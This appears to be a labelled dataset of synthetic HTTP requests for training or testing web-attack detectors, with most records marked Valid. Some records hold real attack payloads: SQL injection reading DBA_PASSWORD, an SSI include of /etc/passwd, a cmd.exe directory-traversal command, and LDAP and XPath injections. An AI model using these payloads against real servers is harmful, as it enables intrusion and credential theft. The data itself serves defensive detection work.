GET /YuWeRH4ooptNK0o/ePfUiC75xi92Iyqnpr9.shtml?etnhlepjonpga=hw7te&3.UADo@Zfwindow.openq=633895671&Ibttoarczis2ttn=eaOXr8&ardm=s9n2vvua7&ogpuseepv=eKwJu1e&W1Ppx=%5CWINNT%5Csystem.ini&asda1nnieXEy=ruW6oxqfiy&fhTD=35371063&01zHayLCin4=i4seicda+h%3A%7Er%5DnL&nietoi=hc8qeshutdowni%7Cg++iu%7E+gutey&ogor98h=17763406&Tbzv=sH+h6An1lDsbj8&huuAde8Ihtsaeo=7t%25I HTTP/1.1
Host: www.rewgeame.org
Connection: close
Accept: text/html, application/postscript
Accept-Charset: *
Accept-Encoding: *
Accept-Language: i-tbtbrew, wneh4ue-shl, dEj6sdy-fsng;q=0.3, t-aaoqiqpr
Cache-Control: max-age=31
Client-ip: 32.239.48.70
Cookie: nbHn=wqe;YYzyuou_tPpf=cwbuse;Rk2deletestyleE0c7Jkf= leg
Cookie2: $Version="20"
Date: Thu, 05 Jan 06 17:57:05 GMT
ETag: "Ze@vy62aYSghPKIo"
Expect: 100-continue
From: muibee@Egtuem.uk
If-Modified-Since: Thu, 23 Apr 09 06:35:52 UTC
If-Unmodified-Since: Fri, 28 Aug 09 09:08:27 GMT
If-Match: "ydsfSejSRfDbM_XoxlYx"
If-None-Match: "S@3pqppy8N3ysEXy1"
If-Range: *
Max-Forwards: 1080
MIME-Version: 3.3
Pragma: sa=lItz
Proxy-Authorization: enba eOsywabt=bulrtl
Authorization: Basic ZW5wSDp0c2hh
Range: 903-3,3-4324,-8
Referer: /9aeperoh/uahrE3h/cbfeg4gI/t0iw.jsp
TE: trailers
Trailer: Accept-Language
User-Agent: rts6ennAeesb
UA-CPU: 68000
UA-Disp: 6548,353,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 589x0586
Via: 3.6 187.66.182.212
Transfer-Encoding: identity
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 167.86.117.234
X-Serial-Number: 2215888867609
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45537
Start - Id: 17276
class: Valid
GET /oG@PrJBmISn/egM36Oz@jkrc3Dtk/evFSB6/WPs5inGi_LMW_jO/to/d1uke/iLNttoah7wthefluwr/7k/lT-l35/eve2hWwdeNrdanTmP8u.aspx?ssy4hla=aqh-usrat0+nqh&hrmajiBDee=hBCcEISv1mCv&Kaccess_logwXn=asOp+stdinni6a3stdinexec&iswpnTOiuORoons=0751964194&areri=6625067&oea=osr&6swudneinast7t=rte-c&6swweja3neia=Spimesglahtpassyo%24&SxJpjIffFZ=npuloen&lfee=8oatcet&goidWdlsqrelat4=te&t5t=ed.&7orTeedswis=56596 HTTP/1.1
Host: www.telSlc.biz
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: koi8;q=0.8, macintosh;q=0.6, iso-8859-8-i;q=0.6, koi8-r, cp-936;q=0.6
Accept-Encoding: 
Accept-Language: wi-cccu, uosAsnw-a5h7Wktn, cim19t-yoaoup;q=0.5
Cache-Control: min-fresh=16
Client-ip: 68.43.213.56
Cookie: 3Hhtpassn=234149;agmailJvbscriptwT=fr;6yOqforms3mochaO=de0y;RxYkBY.6=3;nen709= ebSjeegrt1r
Cookie2: $Version="6"
Date: Thu, 04 Jun 09 19:28:43 GMT
ETag: "zAGMJ7nN7fRLQUz4e"
Expect: 8r0cEafD
From: ahipt@bhraulhaa.fr
If-Modified-Since: Thu, 22 Mar 07 06:12:00 GMT
If-Unmodified-Since: Mon, 15 Mar 10 11:53:59 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic dnRuamVzdGE6dGF0dGhlZQ==
Authorization: Renl8a oR9wl=ntEc1rn
Range: 09626-1394,221800-
Referer: /herie/1ine/awfgt4lt/gzcrpRe.png
TE: trailers,gzip;q=0.2
Trailer: Accept-Encoding
User-Agent: Mozilla/3.2 (X11; U; SunOS sun4u 4.3; zv-ra; rv:8.4.4) Gecko/03120812
UA-CPU: StrongARM
UA-Disp: 7151,7445,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 552x034
Via: mcacd/6.0 46.187.245.178, 6.0 160.133.155.236
Transfer-Encoding: deflate
Upgrade: omut/4.3, 2v0hp/4.8
Warning: 777 187.18.89.168 "Teh2ae2bls6aot" 
X-Forwarded-For: 153.184.197.192
X-Serial-Number: 835471798337
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17276
Start - Id: 23891
class: Valid
GET /njuNGnMfks7pPHZJZ/8J4/5htgpoepcib9/rRRyjpt2gt/_evalAbgsoundp7ug7optEevalS/aXns_SNi-zt5-9IGGUgU.mspx?n1=9%26esenel9S+&dterc=tf_l.IOI3&S..TA5BWNeM=ohts&otSIeicbmt9bl0=nS%2Fdd&Eayhooolemtd1sa=4qDG&d2jT=7818297&3Uy8K=%5BsevaleJskiei&08ETsock_stream3@=42014&uetasjj=4115053&1g6R4Gd=schez%24oahmtnol&sba5fnimi=4recrawrusseca4z&cF@Qk.869=fAdHkXeI0S HTTP/1.0
Host: www.osei6ess.ch
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 36.165.156.12
Cookie: moV-jsktmpQ=15;KZechoW=dacteliketv;UoarldahiTNosvl=i0Prrcp
Cookie2: $Version="27"
Date: Thu, 02 Mar 06 13:23:58 CET
ETag: W/"4sS2Jb4ev5-uu7FjJ"
Expect: 100-continue
From: nt7rur2b@ieUStzn.biz
If-Modified-Since: Thu, 04 Jun 09 15:26:10 GMT
If-Unmodified-Since: Sat, 11 Jul 09 22:04:44 GMT
If-Match: *
If-None-Match: "RfuZnK3a33LaJfXOT1"
If-Range: Sat, 23 Jan 10 06:15:13 UTC
Max-Forwards: 8
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest qop=6roi1d
Range: 1-114,-341
Referer: /sscnvun/Ovntn5cA/7ztiyEE.cfm
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: iaottm
UA-CPU: Sparc
UA-Disp: 722,7012,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7253x9892
Via: 1.1 www.u5nub.png, 7.9 152.5.239.123, 3.7 89.169.247.112:61
Transfer-Encoding: deflate
Upgrade: zt1s/2.6, mts7/3.4
Warning: 002 www.5girkg.js "MDcrsoovsn9ab8caPt" 
X-Forwarded-For: 87.73.118.107
X-Serial-Number: 32892404874
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23891
Start - Id: 23967
class: Valid
GET /hatodsrTatwsr/x4YhNkw/gbrnoabltecnete/e5an8clboetoh/lwYsrnj/f_xkdji/oeWjGptEew91s5/3Q.qLp/tmoeb3ldh/uOYz.f0Bd83lE3.msf?leemiGocmee3=Astr&mbnC8tLyafeeuun=2893689364&MlOtecttsert=Cihu&CinC4J5=05739574&hscfpd4nn=3&-4U3YQoshutdownBRv=04868&tfiqd=iJkR7KBxae&yh=ls%29++swrnEh7utar&Twaie10=6394&hnhaihalnrhn6I=np5yn HTTP/1.1
Host: www.t2eranml.net
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-turkish;q=0.4, utf-8, x-mac-greek;q=0.7, utf-7, iso-8859-5
Accept-Encoding: 
Accept-Language: *
Cache-Control: t75=a
Client-ip: 223.33.121.187
Cookie: soouoen3ihCt=u8Se;Neaoest9uteno3e=oo2xeptz;-ktXBjselectNe1oJ=2s
Cookie2: $Version="33"
Date: Thu, 19 May 05 13:20:35 UTC
ETag: W/"pzH1S5tY2gkdg3P"
Expect: piAhnn=ayu8r;oToewez
From: htqn@tqeodss7o.fr
If-Modified-Since: Thu, 21 Sep 06 13:20:05 GMT
If-Unmodified-Since: Sun, 27 Apr 08 03:33:44 UTC
If-Match: *
If-None-Match: "kigHLxaFNVZg4M8dEs"
If-Range: "U@tmQNnDFl51X0uN@"
Max-Forwards: 4
MIME-Version: 9.0
Pragma: s=doxX
Proxy-Authorization: Basic aHVlaTg6bm1kbzIyZXQ=
Authorization: Digest cnonce="ahn64n8"
Range: 074-7647,9-,-3
Referer: /htyseeEd/olati/0em7d/ote3.tar
TE: trailers,deflate;q=0.7,chunked
Trailer: Accept-Charset
User-Agent: yP.ehROLjm http://www.5syhgf.de
UA-CPU: StrongARM
UA-Disp: 862,451,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 424x2298
Via: 9.3 www.Alol.css:7025, eBlnt/7.7 202.120.30.200
Transfer-Encoding: deflate
Upgrade: enhoj/4.8, Bdg/4.7
Warning: 887 www.oialrTl.png:6 "2bmahswyehtth" 
X-Forwarded-For: 53.58.146.5
X-Serial-Number: 149109156633944
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 23967
Start - Id: 38495
class: LdapInjection
GET /eapaeTob4rcpeeP/nseeyctdtdi/PiTfromHFZHTunionHJ/YxR8pz.X/3.mTZ2dftOn.M/OOAbRQexecdwindow.openh4A8J/t5W6dGZETUnejmh/4QEInv5P7vIrGJ4h.t.php4?irjeu3hat=wIUg&ehtEnoH=8848476265&%ulWesA=uascopycpntbl5childo%29%7C%2F2O%3Bg&rnawiswE=frnot&A1n=rajazvfbhtmefYE&hrbtcDth9bOk2=zmeg7&QfblinkrDP@a=no%2Fd81al%2FneiCh&at=5&4VIoJ7jb6.=5268%29%28%26%28objectClass%3Dl4eI%29%28%7C%28sn++++%3D++Tn%29%28cn%3Do++++J*%29%29&dC6HMiAdC=nCH0VuChi HTTP/1.0
Host: 123.156.31.73:9
Connection: close
Accept: application/rtf;q=0.5
Accept-Charset: iso-10646-ucs-2;q=0.6, ks_c_5601-1987;q=0.0, cp-950, koi8
Accept-Encoding: 
Accept-Language: je-4ild7n;q=0.8, bltg9ee-0Wr6cb;q=0.9, ohh-iind, 7oBast8-n;q=0.4, n4-sete7q;q=0.4
Cache-Control: max-stale=878
Client-ip: 233.33.102.205
Cookie: QJ95P@DmNoaX=ahejtaxoiernph-e;ntkrAATl9aerade=lto
Cookie2: $Version="61"
Date: Sun, 26 Apr 09 12:58:39 CET
ETag: "J-fv2rP2MOgclBTG"
Expect: rae1
From: eorT@elrAedmeoy.biz
If-Modified-Since: Sun, 24 Feb 08 07:33:57 UTC
If-Unmodified-Since: Sun, 23 Jan 05 09:50:19 GMT
If-Match: "cmQJnsXf8rFAYXF"
If-None-Match: "RmGcYO3@JqT-4qkF"
If-Range: *
Max-Forwards: 5
MIME-Version: 3.3
Pragma: m5=ez
Proxy-Authorization: Basic ZWxlZmczcjU6Y3NhemQzaXU=
Authorization: Basic aXVSZW86cnNtNw==
Range: 108364-
Referer: /vOUQmd/1ypRe/oaee.txt
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.1 (X11; U; Unix 6.1; tt-ig; rv:4.8.3) Gecko/15299668
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 185x781
Via: HTTP/8.8 www.ittyoat.js, seseA/9.2 www.nscy8ssy.png:1321, FTP/4.5 163.31.200.197:4154
Transfer-Encoding: identity
Upgrade: atd/6.6, fyohd/5.4, rwOx/2.2, 2patf/9.0, swe/3.6
Warning: 955 www.0jeun.css "MnohqAoa9er1renYsg6u" "Wed, 21 Sep 05 20:55:25 CET"
X-Forwarded-For: 226.59.112.50
X-Serial-Number: 66891
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38495
Start - Id: 13164
class: Valid
GET /Ltorr1ostTs553Idwcum/rUee/tlE3Emtpoietift5n/Ea5es6asGb/esiKBa/imeLUb4T/9bCwqRaccess_logexecMvkZ1dM/eofed.msf?mepypoooee=mSp HTTP/1.1
Host: www.hr5ll.com
Connection: close
Accept: image/jpeg;q=0.4
Accept-Charset: iso-8859-8;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 74.65.3.173
Cookie: f0eosBed7= g
Cookie2: $Version="9"
Date: Mon, 30 Apr 07 03:45:12 GMT
ETag: "n9tR8-lMN_crbqnE"
Expect: e7ee=osmnAs
From: rwsup@etdngrygf.ch
If-Modified-Since: Tue, 10 May 05 10:08:30 CET
If-Unmodified-Since: Sat, 21 Aug 04 15:50:48 CET
If-Match: *
If-None-Match: "UciD0zCslT4vWbW3-"
If-Range: "o8a-L_@5ZUOpeplbXd0X"
Max-Forwards: 092
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic Zm5vdWE6b3R4dHM=
Authorization: sanho wEnq=ivsdaa
Range: -0
Referer: /eaoe6ti/ln3z6G.bin
TE: trailers,deflate;q=0.7
Trailer: Max-Forwards
User-Agent: Mozilla/0.6 (Machintosh; U; PPC 5.4; eN-ce; rv:1.2.8) Gecko/79692554
UA-CPU: Sparc
UA-Disp: 7860,6624,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6456x555
Via: HTTP/6.7 170.164.190.89, 5.4 www.n9aRxt.gif, 7.1 24.105.52.165
Transfer-Encoding: gzip
Upgrade: r7hret/3.9, mve/5.9, oiIbha/2.2, anpn/6.2, voe9h/2.5
Warning: 045 www.nInays.shtml "mnn2hK5" "Sat, 06 Dec 08 17:57:34 UTC"
X-Forwarded-For: 141.250.177.130
X-Serial-Number: 74489
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13164
Start - Id: 35222
class: SqlInjection
GET /orea/37lptnoEs9uids/nQ@C5OEWN5/ia23H/mV0xCG6IhvPaBj11jd/ewtqiQeyhirgcem/9-WzQnBI709NX/ta.jS4/nltytoyiesn2wvltrtts/sOxCksBX0QlG2YQg7u.mspx?osrcjndgumtrbh=416595&ucssisc0fd=yx47naoOiei%7Css%28e+hu&TIsAiyeevxm=%27union+select+++PASSWORD++from++DBA_PASSWORD%3B-- HTTP/1.0
Host: www.gbtr6b.uk:80
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad, windows-1254;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=2699
Client-ip: 1.129.63.171
Cookie: ne9oe=oFif0j
Cookie2: $Version="67"
Date: Wed, 02 Apr 08 16:07:22 UTC
ETag: "NfOfdyVU6e@4HME"
Expect: dsSr=Keec;ibhiddns=fentrb
From: oeeetot@ecjsbsx.org
If-Modified-Since: Wed, 17 Jun 09 19:20:54 CET
If-Unmodified-Since: Tue, 20 Apr 04 24:19:06 UTC
If-Match: *
If-None-Match: "_uXR.-4dYrX7BMO3"
If-Range: *
Max-Forwards: 3
MIME-Version: 1.4
Pragma: syy=nqg
Proxy-Authorization: alkiR qetet=eoDage
Authorization: Basic MWdNbmVuaWI6aHRpb2U=
Range: -2,109-7
Referer: http://5tnLivsp.cz/hec3/ihtmaw4a/dvtio/1sAtedeR/nrjuo.mp3
TE: chunked,chunked
Trailer: Accept-Language
User-Agent: reeoEoi/3.0
UA-CPU: Sparc
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0990x1742
Via: e198t4/2.1 www.nrscim6.shtml, 8.9 www.ftee.gif, eoo/4.5 204.197.210.110
Transfer-Encoding: gzip
Upgrade: satc/9.3, dlwu/4.3, ras/0.6, hmrcOE/0.0
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 653794992925901
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35222
Start - Id: 39507
class: SSI
GET /dn2hg3tledlyees2r/e18U6KeeOOj7b8mDcB/6tr.js?yirder=13542&tet=161&pI7bzYtmOCYrcp=90&r4EttnlmsW=015&nGgV1jautoexecgm9a=aeekdhsow4a&z2rbHr7oEca=u&ht2sanohlsm=27517323 HTTP/1.1
Host: 40.180.163.233
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: sea-scsi
Cache-Control: iInhjfsh='xs'
Client-ip: 192.19.49.212
Cookie: plsuiii8uemwmb=teaaov;3T2sge=re amhier;9e10eownph8rr=46987803
Cookie2: $Version="518"
Date: Sun, 03 Apr 05 11:55:00 CET
ETag: "Cs@6kzG1GqeSK6I_A29W"
Expect: 100-continue
If-Unmodified-Since: Sat, 12 Jul 08 18:57:23 CET
If-Match: "Zd_-N@I2mD5HUPyOq"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 5.2
Pragma: no-cache
Authorization: Basic dEM2bTJvQTo2ZXNl
Referer: http://www.t2koaos.gov/srhacsi6.aspx
User-Agent: <!--#include  virtual="/etc/passwd"-->
UA-CPU: MIPS
UA-Color: color16
UA-Pixels: 8306x0856
Via: 2.8 57.44.93.6
Transfer-Encoding: identity
Upgrade: dDl/9.5, nlx/4.9, ahhDz/9.1
Warning: 628 148.151.2.105 "y0cm" 
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39507
Start - Id: 11363
class: Valid
GET /iFv/bqkZ/nr-u1tLxttw/nT/hsw3Eyudelhtfssj/eE7PxgHt6-XMKy./dp/slDHhj_4WC/mail7_-wzVJlocation_cyg.html?Uesr=u&pgnnrninol=615&e6lcStpUtndk=wsm&nkei8z9=31&ciaxe=12649692&e9erakir=ySeyO&w7=efv&a6allnudr=yeexecx4ys&eoh6esiY=feit3BT5r6ae&GsamUXxO=t&hfiTAet=lgdnR1ott&fheaie8rmo7e=CtleEi HTTP/1.0
Host: www.olao2odxse.be
Connection: keep-alive
Accept: application/*;q=0.8
Accept-Charset: x-mac-arabic;q=0.9, x-mac-arabic
Accept-Encoding: *
Accept-Language: nOtec-adaaur8, isndrr-vCszeeon
Cache-Control: no-cache
Client-ip: 218.1.121.67
Cookie: i9Uate2ta79l7=6;Pmqvi=aeg5us;idsster8on1dlr=37290;hg0do50a_NNSKA=4808002619;yQvyMevscript3ANhtpass=uobellbnfDamohstne
Cookie2: $Version="6"
Date: Mon, 02 Feb 04 18:31:42 UTC
ETag: "AL1P3Im9xyb_Ng.B"
Expect: 100-continue
From: tXstmn@rlemsJto.cz
If-Modified-Since: Tue, 23 Feb 10 15:44:54 CET
If-Unmodified-Since: Sun, 24 May 09 01:34:21 CET
If-Match: *
If-None-Match: "3q.rYOOFtMCC7MHSCAw"
If-Range: Mon, 03 May 04 07:55:48 UTC
Max-Forwards: 94
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: NTLM ZXNhdHQ1ZWxmczExdFJ0Y2hpdnFBMmNkUHJyWWdpVkVlc2FpdWV0bmVzbg==
Authorization: TrLYl sn3pa=tewe
Range: -97,143727-
Referer: /ethp8Y/rguDsoc0/7bnYr/tfaeNtba.wav
TE: chunked;q=0.5,trailers
Trailer: Max-Forwards
User-Agent: gcnatwh3wrhme
UA-CPU: StrongARM
UA-Disp: 400,6938,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6133x6762
Via: FTP/9.4 www.odrci.jpg, FTP/2.4 11.94.55.49
Transfer-Encoding: identity
Upgrade: 07rd3w/0.6, sawral/4.2, iioa/6.4, luE/7.0, isdes/2.0
Warning: 883 www.eeiyiwe.jpeg "akusdr" 
X-Forwarded-For: 100.230.251.99
X-Serial-Number: 0505318
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11363
Start - Id: 26771
class: Valid
GET /g2b04/yf/iiTobnTc/e9u9C8HEE7V7xXLYTq/fdoatsENEchlyl4dbl/dYAR-Gj/cAvhlszhyrre9tthaend.php4?Otteives5dnamb=%3Dhb%5Bu%3At8e&berefeg=fmsn%26exaxtu&3tye=oeuocol&el=9103 HTTP/1.1
Host: www.tooiit.org
Connection: ettedat
Accept: */*;q=0.3
Accept-Charset: iso-8859-9;q=0.5, x-mac-icelandic, windows-1257;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 120.60.149.77
Cookie: xfdaakptsi=shutdown8
Cookie2: $Version="868"
Date: Tue, 25 Apr 06 08:40:29 CET
ETag: "ecRAGY-3geTFtmku3"
Expect: 100-continue
From: oGEsoi@p2axestm.gov
If-Modified-Since: Sun, 17 Dec 06 23:13:32 CET
If-Unmodified-Since: Sun, 06 Feb 05 23:20:30 GMT
If-Match: "J2w8kFRyMkXghz8SY"
If-None-Match: "_Pai.1ob77G0Yo2Mjz"
If-Range: "Dvqfq@1iByS3FRJQ8"
Max-Forwards: 5036
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NEli rmsir=wllq2
Authorization: Basic YTZ2QW5sOlN0SGd5Tjlv
Range: 76-3,2076-,-744104
Referer: http://EhV5.it/gfrw.jpeg
TE: trailers
Trailer: From
User-Agent: Mozilla/7.0 (Windows; U; Win 9x 5.6; yr-io; rv:1.5.9) Gecko/82988334
UA-CPU: StrongARM
UA-Disp: 8774,317,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 358x270
Via: FTP/2.6 www.6idr.jpeg:41
Transfer-Encoding: strRo
Upgrade: rrraa/9.2, boeih/0.1, thxga/5.3, daihfa/0.5
Warning: 136 www.ehRdg.jpeg "ee4de" "Tue, 22 Nov 05 24:02:23 UTC"
X-Forwarded-For: 132.196.150.167
X-Serial-Number: 1194043277645
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26771
Start - Id: 5470
class: Valid
PUT /sxW4w26/neO/rznseqEo0bles6ls/lQbL_mEzmSZW.jsp? HTTP/1.0
Content-Length: 139
Content-Language: xto,hnkepwci
Content-Encoding: identity
Content-Location: /jcet6/astnl/oerbh/rtavE6s.cgi
Content-MD5: ZWxyZmZzZWFldmNzaEppaw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 07 Nov 06 19:32:00 CET
Last-Modified: Thu, 22 Jul 04 17:45:38 GMT
Host: 190.45.204.233
Connection: close
Accept: text/*, audio/*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: nrA-cL, i-lhat84e;q=0.7, 0ati5oe-3hkx, io-ilyeaTED, admnrNcB-ahDrspi
Cache-Control: eu='9te'
Client-ip: 150.73.146.141
Cookie: LperlfIe@O@9ifM=t8lnrt;ara9=6818689670;nodeahYMH1WLu=l9lhKegMW;dEepaieess9aez=w$w(logaOnt;cladNE8a=gr@2
Cookie2: $Version="32"
Date: Fri, 30 Jan 04 12:41:22 GMT
ETag: W/"MbtmetX_lvBRSRuluA"
Expect: 100-continue
From: lczro@ehIntmhe.com
If-Modified-Since: Wed, 04 Apr 07 06:21:30 UTC
If-Unmodified-Since: Wed, 09 Jun 04 12:07:59 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 05 Jun 08 16:12:01 UTC
Max-Forwards: 2
MIME-Version: 2.8
Pragma: aigela='0oael'
Proxy-Authorization: ksiih lttrsD=rNe6
Authorization: ekfi 0oeo=knwolUur
Range: 25867-
Referer: http://corZ.ch/donlmn9/mfgwp/ttd9idG.mdb
TE: chunked,trailers,chunked
Trailer: Max-Forwards
User-Agent: daG75UI http://www.ot5rWQo.uk
UA-CPU: PowerPC
UA-Disp: 4898,121,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 898x7009
Via: 8.3 0.177.65.4
Transfer-Encoding: gzip
Upgrade: 47xu/2.2, tevi/6.3, beio/1.1, woe/1.2, gmdaN6/8.8
Warning: 232 205.34.58.158 "A5atihehavykOapat646" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 56905023798190
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

itygee8io=eKQpg6&rte=B8a&trianhh=&m&ymuleaO=8&pnoeoeper=wnte&turynn3nNeap=2243814&z8SA9o-OduHC=euq2btNn3nl&1wo=16&saue2un9Eouna=gFi6YWnig

End - Id: 5470
Start - Id: 36431
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.0
Host: 81.22.78.23
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-arabic
Accept-Encoding: *
Accept-Language: rkoasa4-i;q=0.9, tarwr-ofe;q=0.6, 6n2ihdhp-suanekr
Cache-Control: min-fresh=9040
Client-ip: 250.107.116.23
Date: Sun, 28 Aug 05 09:53:06 GMT
ETag: "RKPYU8tNuJue3c_"
Expect: ajatsei7=hn7Hs
From: AtjrnsE@aethffn.uk
If-Modified-Since: Sun, 14 Oct 07 11:27:50 GMT
If-Unmodified-Since: Mon, 16 Nov 09 23:26:40 CET
If-Match: *
Max-Forwards: 05
MIME-Version: 0.7
Pragma: ons0xyr='imf'
Referer: http://www.gxoo.st/ame3etai.gif
Trailer: Proxy-Authorization
User-Agent: rBZs3xeB http://www.Ed3nx.biz
UA-CPU: PowerPC
UA-Color: color16
Transfer-Encoding: heUo; qzNau=Cdeo
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 

null

End - Id: 36431
Start - Id: 29349
class: Valid
GET /enyanhooeEAi3/11GHY/oIT1Ea/o6e8Itrjxri/idVHzQSqhs0J4D@Q9/bM9O08dojs9ZKyZ7/tayLp/6lmhtyaq/Njd3mCce0eqgzaene.aspx? HTTP/1.1
Host: 37.117.161.232:4
Connection: close
Accept: */*
Accept-Charset: big5, windows-1258;q=0.4, utf-8, cp-932;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 134.100.222.56
Cookie: AIusrhj=thBz7jt;ro=|Met=wp-9cytti[ lnn;vable=-;44eoy7ybjvu2nuw=mths$el hslform he
Cookie2: $Version="038"
Date: Mon, 23 Aug 04 05:18:41 UTC
ETag: "I6lod4.WkBxa_3R"
Expect: 100-continue
From: huEdao@sesefui5t.biz
If-Modified-Since: Mon, 17 Sep 07 19:31:18 GMT
If-Unmodified-Since: Tue, 01 Jul 08 09:05:43 CET
If-Match: *
If-None-Match: "mFXGNLsrU6Xkl2FYkWso"
If-Range: Thu, 19 Apr 07 17:07:25 CET
Max-Forwards: 48
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic U2E5bzpTb2VoMGN0Mg==
Authorization: enzrm meGqad=cjltE
Range: 415-76250
Referer: /cutOde8o/B6ignt9t.php3
TE: gzip;q=0.5
Trailer: Host
User-Agent: Mozilla/7.0 (compatible; Konqueror/5.8; Solaris; AnMaose; eli4ie; setuinAdf2)
UA-CPU: PowerPC
UA-Disp: 575,351,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7326x099
Via: ejeHa6/8.8 89.83.181.39, HTTP/9.7 71.216.247.104, 5.3 97.79.89.58
Transfer-Encoding: uambf
Upgrade: eete/7.2
Warning: 340 213.231.43.122 "dlas45wtieaow8l" "Tue, 29 Dec 09 20:43:56 UTC"
X-Forwarded-For: 41.177.120.181
X-Serial-Number: 725402
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29349
Start - Id: 48683
class: XPathInjection
POST /hhMalm/hvE/sJ8f/Osu/yl0TSpassthruH9mGN/ietvasy2fonag5utnOa/eer.nsf? HTTP/1.1
Content-Length: 272
Content-Language: sobeir,esyka,g
Content-Encoding: deflate
Content-Location: /t3An.mpg
Content-MD5: MG4zTW1va2c2bGNhaWVhbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Jun 06 15:14:33 UTC
Last-Modified: Sat, 16 Jan 10 17:25:25 CET
Host: 62.152.176.53
Connection: trabhaU
Accept: */*
Accept-Charset: x-mac-arabic, iso-8859-2;q=0.3, euc-jp;q=0.3, iso-8859-8
Accept-Encoding: gzip;q=0.7, identity;q=0.5, identity, identity;q=0.3, compress
Accept-Language: aao-sNp, A-gitwy;q=0.6, oVd-invcoay;q=0.6, ct1-aEru7t
Cache-Control: no-transform
Cookie: ewAntotwc=athetnwd
Date: Sun, 09 Apr 06 21:44:11 GMT
ETag: "RxSgWwh1d7-v_H@8wf"
Expect: msaZtkoc=latnrae0;htaddMsP
If-Modified-Since: Mon, 18 Jun 07 08:54:36 CET
If-Unmodified-Since: Sun, 28 May 06 22:43:28 UTC
Max-Forwards: 652
Pragma: no-cache
Referer: /Eatiedi/sIvet8ir/Enhn/tpyoh4/avtt6leE.dll
User-Agent: eo2TfbaulLeri
UA-Color: color16
UA-Pixels: 640x9904
Via: 9.0 www.nEv2aeS.jpg
Transfer-Encoding: deflate

ds7=eteco8y&zWiogaa0Mede=ncthttpsna&rbi=em MeimvmincludeiDh4&aofwoge5xa=SeO&xdh5tO=3x']     |    P    |  //user[    name/text(   )  = 'iw&srgfurA=o2GrBME3G9&eryby=iol&tlsinitU7ttFi=E3lk&misiyoaInaepre=19313&uWW_Wl.W8Ytw=91296&8ccwrfbrBDlehi=4860867

End - Id: 48683
Start - Id: 19628
class: Valid
